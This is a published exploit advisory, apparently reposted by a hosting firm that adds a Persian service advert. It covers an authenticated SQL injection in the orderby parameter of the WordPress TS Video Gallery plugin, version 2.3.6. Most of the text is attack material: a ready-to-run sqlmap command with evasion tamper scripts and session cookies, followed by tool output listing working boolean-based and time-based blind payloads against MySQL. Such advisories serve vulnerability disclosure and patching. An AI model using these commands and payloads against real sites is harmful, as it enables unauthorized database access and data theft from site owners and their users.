WordPress Video Gallery – YouTube Gallery And Vimeo Gallery 2.3.6 SQL Injection
# Exploit Title: Wordpress Video Gallery – YouTube Gallery and Vimeo Gallery Plugin SQL Injection
# Date: 2024-07-05
# Exploit Author: tmrswrr
# Category : Webapps
# Vendor Homepage: https://total-soft.com/wp-video-gallery/
# Version 2.3.6
1. **Access the Admin Panel:**
– Navigate to the admin panel of your WordPress site.
– Go to `TS Video Gallery > `Create ` > ` Use Theme` and save it.
“`
2. After save it back to TS Video Gallery Click title : https://localhost/wordpress/wp-admin/admin.php?page=tsvg-admin&orderby=TS_VG_Title&order=asc
3. Search for orderby parameter.
## SQLMAP COMMAND
python3 sqlmap.py -u “https://localhost/wordpress/wp-admin/admin.php?page=tsvg-admin&orderby=TS_VG_Title&order=desc” –batch –dbms=mysql –thread 10 –no-cast –random-agent -v 3 –tamper=”between,randomcase,space2comment” –level=5 –risk=3 -p orderby –cookie=”wordpress_logged_in_d31d6d9d0bfd834c03c5a471886561f0=admin|1720346143|BXq7Kk6kWE6W8OhFfxRfE1vpFt00m9gRiPafjJPDU1N|0b78b25e2683d7f381967019db82b3f3fd9b06f1524ec128af92a74fe7c68e8f; \
wordpress_sec_d31d6d9d0bfd834c03c5a471886561f0=admin|1720346143|BXq7Kk6kWE6W8OhFfxRfE1vpFt00m9gRiPafjJPDU1N|307f68044e4c2632757b13f86f770ceda3c9c7866a0b595b33a7a2f675224a15; \
wordpress_test_cookie=WP Cookie check; \
wp-settings-time-1=1720173805″ –thread 10
## RESULT
sqlmap identified the following injection point(s) with a total of 1026 HTTP(s) requests:
—
Parameter: orderby (GET)
Type: boolean-based blind
Title: Boolean-based blind – Parameter replace (original value)
Payload: page=tsvg-admin&orderby=(SELECT (CASE WHEN (1078=1078) THEN 0x54535f56475f5469746c65 ELSE (SELECT 2977 UNION SELECT 8545) END))&order=desc
Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=tsvg-admin&orderby=TS_VG_Title AND (SELECT 6127 FROM (SELECT(SLEEP(5)))mIWx)&order=desc
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
—
[08:37:45] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[08:37:45] [INFO] the back-end DBMS is MySQL
[08:37:45] [PAYLOAD] (seLecT/**/(cAsE/**/WHen/**/(veRSIOn()/**/liKe/**/0x254d61726961444225)/**/ThEN/**/0x54535f56475f5469746c65/**/elSE/**/(seLecT/**/6685/**/UNiON/**/seLecT/**/9990)/**/End))
web application technology: Apache 2.4.54, PHP 8.0.23
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
آسیبپذیریهای جدید و وصلههای امنیتی بهصورت مداوم منتشر میشوند و عدم بروزرسانی بهموقع میتواند امنیت سرویسهای حیاتی را به خطر بیندازد. خدمات مدیریت و پشتیبانی سرور آفاق هاستینگ شامل پایش امنیتی، بروزرسانی نرمافزارها، نصب Patchهای امنیتی و سختسازی سرورها است.
خدمات مدیریت و امنیت سرور